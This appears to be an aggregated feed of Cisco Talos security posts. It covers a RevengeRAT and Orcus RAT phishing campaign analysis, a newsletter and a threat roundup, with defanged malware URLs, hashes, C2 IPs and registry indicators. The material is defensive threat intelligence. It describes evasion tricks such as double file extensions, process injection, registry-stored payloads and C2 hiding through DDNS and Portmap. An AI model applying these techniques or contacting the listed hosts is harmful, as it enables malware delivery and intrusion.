                  hxxp://107.182.28.64/t0[.]txt
                  hxxp://uio.hognoob.se:63145/cfg[.]ini
                  hxxp://fid.hognoob.se/HidregSvc[.]exe
                  hxxp://188.166.74.218/untitled[.]exe
                  hxxp://45.55.211.79/.cache/untitled[.]exe
                  hxxp://188.166.74.218/untitled[.]exe

                  IP Addresses

                  185.234.218.248

                  Case study 3

                  Files:

                  fe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive
                  2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062
                  f3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-0099
                  b46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating a user
                  ab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites

                  Legitimate Tools:

                  ee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace Studio
                  d1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio

                  RAT Ratatouille: Backdooring PCs with leaked RATs

                  $
                  0
                  0
                  By Edmund Brumaghin and Holger Unterbrink.

                  Executive summary

                  Orcus RAT and RevengeRAT are two of the most popular remote access trojans (RATs) in use across the threat landscape. Since its emergence in 2016, various adversaries used RevengeRAT to attack organizations and individuals around the world. The source code associated with RevengeRAT was previously released to the public, allowing attackers to leverage it for their own malicious purposes. There are typically numerous, unrelated attackers attempting to leverage this RAT to compromise corporate networks for the purposes of establishing an initial point of network access, the performance of lateral movement, as well as to exfiltrate sensitive information that can be monetized. Orcus RAT was in the news earlier this year due to Canadian law enforcement activity related to the individual believed to have authored the malware.

                  Cisco Talos recently discovered a threat actor that has been leveraging RevengeRAT and Orcus RAT in various malware distribution campaigns targeting organizations including government entities, financial services organizations, information technology service providers and consultancies. We discovered several unique tactics, techniques, and procedures (TTPs) associated with these campaigns including the use of persistence techniques most commonly associated with "fileless" malware, obfuscation techniques designed to mask C2 infrastructure, as well as evasion designed to circumvent analysis by automated analysis platforms such as malware sandboxes.

                  The characteristics associated with these campaigns evolved over time, showing the attacker is constantly changing their tactics in an attempt to maximize their ability to infect corporate systems and work toward the achievement of their longer-term objectives.

                  Malicious email campaigns

                  There have been several variations of the infection process associated with these malware distribution campaigns over time. In general, the emails in every case claim to be associated with complaints against the organization being targeted. They purport to be from various authorities such as the Better Business Bureau (BBB). Below is an example of one of these emails:
                  Phishing email
                  In addition to Better Business Bureau, Talos has also observed emails purporting to be associated with other entities such as Australian Competition & Consumer Commission (ACCC), Ministry of Business Innovation & Employment (MBIE) and other regional agencies.

                  Earlier malware campaigns contained a hyperlink that directed potential victims to the malicious content responsible for initiating the malware infection. The attacker made use of the SendGrid email delivery service to redirect victims to an attacker-controlled malware distribution server.

                  The link in one example email was pointed to the following SendGrid URL:

                  https://u12047697[.]ct[.]sendgrid[.]net/wf/click?upn=X2vR6-2FdIf8y2XI902U8Tc8qh9KOPBogeTLss4h7AKXe0xRjCQw1VcMTssPPPTU28KY7PwUPERvVvIa8n4VQD-2Fw-3D-3D_tIiqtngjMfK6xwiZyGxyMuaZ5weLruJKBoFJsVrKYBziY2h51ElcQ2ocLru0oJCxt-2FOlkcr6RH8ktqTc-2B-2BQjmMscOQaeiy2zw8OOUb6nD0f1srQnQG-2B-2BIXtpubqjWMnnIHxJg3TvgFRq0itu75WQHjsdUv1O1g-2FrQzQAyJkGQN6vC9fH5R4R4FyLG9ahUnvbnHt-2FEmdUJQuft0jfw2c5uPBA2M5Yspgi-2Fodr8cEU2b8-3D

                  This URL is responsible for redirecting the client to a URL hosted on an attacker-controlled server that hosts a ZIP archive containing the malicious PE32 used to infect the system. Below, you can see the HTTP GET request that is responsible for retrieving this and continuing the infection process.
                  ZIP File download
                  A PE32 executable is inside of the ZIP archive. It needs to be executed by the victim to infect the system with Orcus RAT. The PE32 filename features the use of double extensions (478768766.pdf.exe) which, by default on the Windows operating system, will only display the first extension (.PDF.) The PE32 icon has been set to make the file appear as if it is associated with Adobe Acrobat.

                  Double extensions trick



                  This loader (478768766.pdf.exe) is protected by the SmartAssembly .NET protector (see below), but can easily be deobfuscated via d4dot. It is responsible for extracting and decrypting the Orcus RAT. It extracts the Orcus executable from its Resource "人豆认关尔八七" as shown in the screenshots below.
                  Orcus loader resources

                  The Class5.smethod_1 method, shown in the screenshot below, decodes the content from the resource section and restores the original Orcus RAT PE file.
                  Resource section payload decoding
                  The smethod_3 shown below finally starts another instance of the loader (478768766.pdf.exe) and injects the Orcus PE file into this loader process. Then it resumes the process, which executes the Orcus RAT PE file in memory in the 478768766.pdf.exe process context. This means the original Orcus RAT PE file is never written to disk in clear text. This makes it more difficult for anti virus systems to detect it.
                  Process injection method
                  The loader achieves persistence by creating a shortcut that points to its executable and storing the shortcut in the following Startup directory:

                  C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 

                  The dropper also copies itself over to %APPDATA%\Roaming\trfgtf\rfgrf.exe and creates and starts the rfgrf.exe.bat file, which you can see below. The bat file executes the copy of the loader every 60 seconds.
                  rfgrf.exe.bat

                  In later campaigns, the adversary modified the infection process and emails no longer leveraged the SendGrid URLs. Later emails featured the same themes and verbiage but were modified to contain ZIP archive attachments.

                  Phishing email
                  The attached ZIP archives contain malicious batch files responsible for retrieving the malicious PE32 file and executing it, thus infecting the system. Early versions of the batch file retrieved additional malicious content from the same server previously used to host the ZIP archives.
                  Malicious .bat downloader
                  One interesting thing to note about the batch files was the use of an obfuscation technique that is not commonly seen. In early campaigns, the attacker prepended the bytes "FF FE 26 63 6C 73 0D 0A" into the file, causing various file parsers to interpret the file contents as UTF-16 LE, resulting in the parsers failing to properly display the contents of the batch file.
                  Unicode obfuscation standard editor

                  The hex view of the same file shows these prepended bytes which are responsible for this parsing issue.
                  Unicode obfuscation hex view
                  This is a well-known technique as can be observed in the forum thread here.

                  Later versions of the .bat downloader featured the use of obfuscation in an attempt to make analysis more difficult. They are using a simple obfuscation method and are just replacing all characters by variables that are resolved at runtime.
                  Obfuscated RevengeRat .bat downloader
                  The decoded version of the .bat file looks like this. Like in the non-obfuscated versions of the .bat file, the adversaries are downloading the .js file to a local directory (C:\windows\r2.js) and executing it.
                  Decoded obfuscated .bat file

                  This r2.js file is another obfuscated script. It is filled with a bunch of rubbish and one long line of code.
                  Downloaded r2.js file
                  This scripts writes the 'TVqQ…' string into the registry.
                  r2.js payload

                  Stored encoded malware in registry key
                  It loads this string at the end of the infection process, decodes it and executes it.
                  r2.js payload decoding routine
                  Decompiling this payload in dnSpy shows an old friend: RevengeRAT.
                  RevengeRAT decompiled binary


                  Command and control (C2) obfuscation


                  As is the case with many popular RATs, the C2 infrastructure was observed leveraging Dynamic Domain Name System (DDNS) in an attempt to obfuscate the attacker's infrastructure. In the case of these malware campaigns, the attacker took an additional step. They pointed the DDNS over to the Portmap service to provide an additional layer of infrastructure obfuscation.

                  Portmap is a service designed to facilitate external connectivity to systems that are behind firewalls or otherwise not directly exposed to the internet.
                  Port forwarding service
                  These systems initiate an OpenVPN connection to the Portmap service, which is responsible for handling requests to those systems via port mapping. We have recently observed an increase in the volume of malicious attackers abusing this service to facilitate the C2 process across various malware families.
                  HTTPS certificate

                  As demonstrated above, the DNS configuration for the DDNS hostname used by the malware for C2 has actually been pointed to the Portmap service. Let's Encrypt issued the SSL certificate associated with this host.

                  Payload analysis

                  The adversaries used at least two different RATs in the campaigns which we have closely analyzed: Orcus RAT and RevengeRAT. For both RATs, the source code was leaked in the underground and several adversaries have used it to build their own versions. You can see the comparison of the leaked version of RevengeRAT and the one we analyzed below.
                  Compairson leaked malware and modified one
                  The adversaries changed the source code slightly. They moved the original code into separate functions and changed the execution order a bit plus added other minor changes like additional variables, but overall the code is still very similar to the leaked code. On the other hand, it is modified so that the resulting binary looks different for AVs.

                  It is interesting to see that both (Client) IDs are pointing to the same name: CORREOS. In the Nuclear_Explosion file, aka RevengeRAT, it is only base64 encode "Q09SUkVPUw==".
                  RevengeRAT Atomic class config

                  Orcus decoded XML config


                  Conclusion


                  These malware distribution campaigns are ongoing and will likely continue to be observed targeting various organizations around the world. RevengeRAT and Orcus RAT are two of the most popular RATs in use across the threat landscape and will likely continue to be heavily favored for use during the initial stages of attacks.

                  Organizations should leverage comprehensive defense-in-depth security controls to ensure that they are not adversely impacted by attacks featuring these malware families. At any given point in time, there are several unrelated attackers distributing these RATs in different ways. Given that the source code of both of these malware families is readily available, we will likely continue to see new variants of each of these RATs for the foreseeable future.

                  Coverage

                  Additional ways our customers can detect and block this threat are listed below.


                  Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                  Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                  Email Security can block malicious emails sent by threat actors as part of their campaign.

                  Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                  AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                  Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                  Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


                  Indicators of Compromise (IOCs)


                  The following indicators of compromise (IOCs) have been observed to be associated with malware campaigns.

                  ZIP Hashes (SHA256):

                  c66c96c8c7f44d0fd0873ea5dbaaa00ae3c13953847f0ca308d1f56fd28f230c
                  d6c5a75292ac3a6ea089b59c11b3bf2ad418998bee5ee3df808b1ec8955dcf2a

                  BAT Hashes (SHA256):

                  20702a8c4c5d74952fe0dc050025b9189bf055fcf6508987c975a96b7e5ad7f5
                  946372419d28a9687f1d4371f22424c9df945e8a529149ef5e740189359f4c8d

                  PE32 Hashes (SHA256):

                  ff3e6d59845b65ad1c26730abd03a38079305363b25224209fe7f7362366c65e
                  5e4db38933c0e3922f403821a07161623cd3521964e6424e272631c4492b8ade

                  JS Hashes (SHA256):

                  4c7d2efc19cde9dc7a1fcf2ac4b30a0e3cdc99d9879c6f5af70ae1b3a846b64b

                  Domains:

                  The following domains have been observed to be associated with malware campaigns:

                  skymast231-001-site1[.]htempurl[.]com
                  qstorm[.]chickenkiller[.]com

                  IP Addresses:

                  The following IP addresses have been observed to be associated with malware campaigns:

                  193[.]161[.]193[.]99
                  205[.]144[.]171[.]185

                  Threat Source newsletter (Aug. 22)

                  $
                  0
                  0

                  Newsletter compiled by Jon Munshaw.

                  Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                  What’s old is new again.

                  Our research this week centers around a series of long-lasting threat actors and malware that have been given new life.

                  China Chopper, a 9-year-old web shell, is more prevalent than ever now that the source code is out there, so any threat actor could conceivably use it. We recently discovered three distinct campaigns using it for a variety of malicious activities.

                  We’ve also discovered threat actors using two of the most popular RATs— Orcus RAT and RevengeRAT — to target government entities, financial services organizations, information technology service providers and consultancies.

                  We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

                  Upcoming public engagements with Talos

                  Event: “DNS on Fire” at Virus Bulletin 2019
                  Location: Novotel London West hotel, London, U.K.
                  Date: Oct. 2 - 4
                  Speaker: Warren Mercer and Paul Rascagneres
                  Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                  Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                  Location: Metro Toronto Convention Center, Toronto, Canada
                  Date: Oct. 7 - 10
                  Speaker: Edmund Brumaghin and Earl Carter
                  Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                  Cyber Security Week in Review

                  • Apple released a patch to fix a jailbreak vulnerability in iPhones. The update came weeks after the company mistakenly unpatched a previous fix for the bug, which was eventually discovered by a security researcher. 
                  • The U.S. government is close to releasing a plan focused on protecting the 2020 U.S. presidential election from a ransomware attack. Officials are concerned with protecting voter registration databases from theft, manipulation or total takeover. 
                  • Spammers have started using Google Calendar invites as their latest attack vector. These invites usually contain malicious links, and clicking on these links will signal to the attacker to send additional invites in the future. 
                  • Courts in Georgia are still recovering from a ransomware attack earlier this year. Their systems are still down, forcing many to keep track of criminal cases and traffic citations with paper records. 
                  • U.S. officials say a cyber attack earlier this summer against Iran has hindered the country’s ability to target American oil tankers. Iran is reportedly still recovering data from the attack and has had to totally restart some systems, including military communications networks. 
                  • Security researchers discovered two malicious apps on the Google Play store that ran ads in the background on users’ devices, draining battery power and increasing mobile data usage. The apps were downloaded a combined 1.5 million times. 
                  • Home security company Ring says it has partnerships with more than 400 police departments across the country. This collaboration can take several forms, including information-sharing, access to Ring’s online community and rebates to customers. 
                  • French police and a security firm teamed up to remove a wormable cryptocurrency miner from 850,000 machines in the country. The botnet’s C2 server contained a vulnerability that allowed the team of researchers to make it possible for the victims to remove the miner without executing any additional code. 
                  • NATO’s secretary general said the military alliance would collectively respond to a major cyber attack on one of its 29 member countries. Jens Stoltenberg used the 2017 Wannacry attack as an example of something that could trigger the “Article 5” clause in NATO’s charter. 
                  • Apple says it will no longer retain recordings of users’ conversations with Siri and released an apology for allowing humans to listen to the recordings in the past. The company now says users can choose to opt in to the program, which is designed to improve Siri’s capabilities. 

                  Notable recent security issues

                  Title: Critical vulnerabilities found in some Cisco smart switches 
                  Description: Two vulnerabilities in Cisco's 220 series of smart switches for small businesses could allow an attacker to leak sensitive information or inject malicious code. CVE-2019-1912 could allow an attacker to bypass security checks on the switch and upload arbitrary files. And CVE-2019-1913 opens the switches to a buffer overflow attack, which could be used to gain the ability to remotely execute code on the machine with root privileges. 
                  Snort SIDs: 51293 – 51295 (Written by John Levy), 51298 – 51300 (Written by Amit Raut), 51306 - 51307 (Written by Tim Muniz) 

                  Title: Popular VPN services open to attack, data leaks  
                  Description: Attackers are actively exploiting vulnerabilities in the Fortigate and Pulse VPN services to steal encryption keys, passwords and other sensitive data. These campaigns, which started last week, target the Webmin utility for managing Linux and *NIX systems. These are devices in enterprise networks, and the vulnerabilities involved could allow an attacker to take complete control of a system. 
                  Snort SIDs: 51240 – 51243 (Written by John Levy), 51288, 51289 (Written by Joanne Kim)

                  Most prevalent malware files this week

                  SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3  
                  MD5: 47b97de62ae8b2b927542aa5d7f3c858 
                  Typical Filename: qmreportupload.exe 
                  Claimed Product: qmreportupload 
                  Detection Name: Win.Trojan.Generic::in10.talos 

                  SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510  
                  MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                  Typical Filename: xme64-2141.exe
                  Claimed Product: N/A
                  Detection Name: W32.7ACF71AFA8-95.SBX.TG

                  SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c  
                  MD5: c785a8b0be77a216a5223c41d8dd937f 
                  Typical Filename: cslast.gif 
                  Claimed Product: N/A 
                  Detection Name: W32.1755C179F0-100.SBX.TG 

                  SHA 256:
                   46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08  
                  MD5: db69eaaea4d49703f161c81e6fdd036f
                  Typical Filename: invoice.exe
                  Claimed Product: N/A
                  Detection Name: W32.46B241E3D3-95.SBX.TG

                  SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                  MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f 
                  Typical Filename: sayext.gif 
                  Claimed Product: N/A 
                  Detection Name: W32.093CC39350-100.SBX.TG 

                  Beers with Talos Ep. #60: Summer camp flashbacks and defining your intel

                  $
                  0
                  0


                  Beers with Talos (BWT) Podcast episode No. 60 is now available. Download this episode and subscribe to Beers with Talos:

                  If iTunes and Google Play aren't your thing, click here.

                  Recorded Aug. 16, 2019 — The understatement of the day would be the guys were in some kind of mood when we recorded this. There is no explaining the way they are sometimes. We ended up discussing a lot of the awesome things that went on at Blackhat and DEFCON, like the time Matt and Mitch got ejected from the Aviation Village for recognizing the prowess of the greatest plane ever built. And also the time Joel ejected himself from the Cisco party. Deeper in the episode we get into threat intelligence: What is it, how to find the intel you need, and how do you leverage it to create value?

                  The timeline:

                  • 02:00 — Roundtable: Leeroy Jenkins, gratitude, and a special guest Esler
                  • 15:25 — Blackhat and DEFCON recap
                  • 51:10 — Threat intelligence: What this means and how you need to be using it
                  ==========

                  Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                  Hosted by Mitch Neff (@MitchNeff)
                  Subscribe via iTunes (and leave a review!)


                  Subscribe to the Threat Source newsletter


                  Give us your feedback and suggestions for topics: beerswithtalos@cisco.com


                  Threat Roundup for August 23 to August 30

                  $
                  0
                  0
                  Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 23 and Aug. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                  As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                  For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                  The most prevalent threats highlighted in this roundup are:
                  Threat NameTypeDescription
                  Win.Worm.Vobfus-7141112-0 Worm Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
                  Win.Dropper.VertexNet-7139734-0 Dropper VertexNet is a remote access trojan that provides basic functionality like the ability to download files, monitor keystrokes, and provide a remote shell to the attacker.
                  Win.Malware.Ursnif-7139346-0 Malware Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
                  Win.Trojan.Remcos-7136041-1 Trojan Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
                  Win.Dropper.TrickBot-7135730-0 Dropper Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts.
                  Win.Dropper.Nymaim-7135710-0 Dropper Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
                  Win.Ransomware.TeslaCrypt-7135496-1 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
                  Win.Dropper.SpyEye-7134261-0 Dropper SpyEye is an information-stealing malware that attempts to collect usernames, passwords, and credit card numbers as they are entered into the user's web browser.
                  Win.Dropper.Qakbot-7133972-0 Dropper Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.

                  Threat Breakdown

                  Win.Worm.Vobfus-7141112-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\TOOLBAR
                  Value Name: Locked
                  10
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                  Value Name: ShowSuperHidden
                  10
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 10
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                  Value Name: NoAutoUpdate
                  10
                  <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 10
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jxwiq
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jeoeri
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: guuagu
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: buazoe
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: weouw
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: puoleey
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: vuudei
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: qjzaet
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: seaumu
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: baeboig
                  1
                  MutexesOccurrences
                  A10
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  204[.]11[.]56[.]4810
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  ns1[.]timedate3[.]com10
                  ns1[.]timedate3[.]net10
                  ns1[.]timedate1[.]org10
                  ns1[.]timedate2[.]org10
                  ns1[.]timedate1[.]net10
                  ns1[.]timedate2[.]com10
                  ns1[.]timedate1[.]com10
                  ns1[.]timedate3[.]org10
                  Files and or directories createdOccurrences
                  \autorun.inf10
                  \System Volume Information.exe10
                  \$RECYCLE.BIN.exe10
                  \Secret.exe10
                  \Passwords.exe10
                  \Porn.exe10
                  \Sexy.exe10
                  E:\autorun.inf10
                  E:\$RECYCLE.BIN.exe10
                  E:\Passwords.exe10
                  E:\Porn.exe10
                  E:\Secret.exe10
                  E:\Sexy.exe10
                  E:\System Volume Information.exe10
                  E:\x.mpeg10
                  %HOMEPATH%\Passwords.exe10
                  %HOMEPATH%\Porn.exe10
                  %HOMEPATH%\Secret.exe10
                  %HOMEPATH%\Sexy.exe10
                  \<random, matching '[a-z]{4,7}'>.exe10
                  E:\<random, matching '[a-z]{4,7}'>.exe10
                  %HOMEPATH%\<random, matching '[a-z]{5,7}'>.exe10
                  %HOMEPATH%\RCX<random, matching '[A-F0-9]{3,4}'>.tmp7

                  File Hashes

                  c2767a62350a0d537b904317441c9634c0061229f88e6fdd2de972424c771355 deca43beac62ac0403adc173e8c8b45b34835165ea8241798233900870485cff e8151e83c5c703087f2f582d7d7666e9e563f19baf9eca55b00b1a8f357cb2fb e89bf0455c034b1c8c2f3813c21a5c563dfe4dcd4b1961131295d4477567b2f6 e8fc6f6c1e1dfcfaac05ea6e45cb1404ae8ef5508357fd2e6e897872761c1a73 eb4d9953b0d832e4e5be31ce624b1757dc503e548f1c85cdc871d11ac90930bd ef5099250b297ee7f0c34dff49d345f179935d1d32cbdce429769471359701a3 f0b6c9062f5601e99f3015db1bdb35e23984fe65c420ebe5e6984644d18312d7 f1ad5be9676c05b1242c6fcfb4dd86062cba1e1fe5aeaf1925387414aff90088 fb6cca89549e3d3d0c80a46080ff27dc2e06ad7081297e3a5e9c2baffe7eac30

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Dropper.VertexNet-7139734-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: win32
                  14
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Svchost
                  7
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  4
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: winlogon
                  4
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: windowsAccApp
                  4
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: windef
                  3
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Windows
                  3
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: winupdate
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Microsoftnts
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Google Updater
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: system
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: maz
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: ctfmon
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Microsoft
                  2
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Windows Update
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: explorer.exe
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: UniKey
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: taskmng
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: WinHostMngr
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: VIRUS
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Adobe
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: CRACKWIN
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: jusched
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: vm
                  1
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: WinApISBMhost
                  1
                  MutexesOccurrences
                  VN_MUTEX16285
                  win3214
                  rundll2314
                  Global\c020f8c1-c573-11e9-a007-00501e3ae7b514
                  explorer.exe2
                  VN_MUTEX2
                  Me_MUTEX162
                  sadfsadfhmj4353t gfvb1
                  VN_MUTEX291
                  VN_Nyarkouf1
                  DiZi_MUTEX1
                  unh43n805q951
                  634t1
                  VN_MUTEXL33T1
                  X86 Host Process for Windows1
                  fadsfgagdfgaewwfadsfsda1
                  VN_inet11
                  net work1
                  VN_SAINT1
                  6826863HGGUSG27821
                  VN_MUTEX1331
                  teshell::netstat -an1
                  rundll32.exe1
                  WIU23fwfhWEHF2fwjhWJKHef2f1
                  VN_B4SMIX1
                  *See JSON for more IOCs
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  153[.]92[.]0[.]10062
                  104[.]20[.]67[.]4635
                  104[.]20[.]68[.]4627
                  185[.]185[.]84[.]21018
                  199[.]59[.]242[.]15115
                  144[.]76[.]162[.]2457
                  175[.]126[.]123[.]2195
                  104[.]25[.]37[.]1084
                  72[.]9[.]150[.]2444
                  31[.]170[.]160[.]574
                  35[.]186[.]238[.]1013
                  162[.]253[.]155[.]2253
                  5[.]57[.]226[.]2023
                  91[.]195[.]240[.]2103
                  185[.]53[.]179[.]292
                  185[.]53[.]178[.]82
                  104[.]200[.]23[.]952
                  204[.]11[.]56[.]482
                  88[.]99[.]150[.]2162
                  23[.]20[.]239[.]122
                  18[.]211[.]9[.]2062
                  95[.]211[.]219[.]662
                  69[.]162[.]80[.]552
                  81[.]171[.]22[.]72
                  195[.]20[.]43[.]882
                  *See JSON for more IOCs
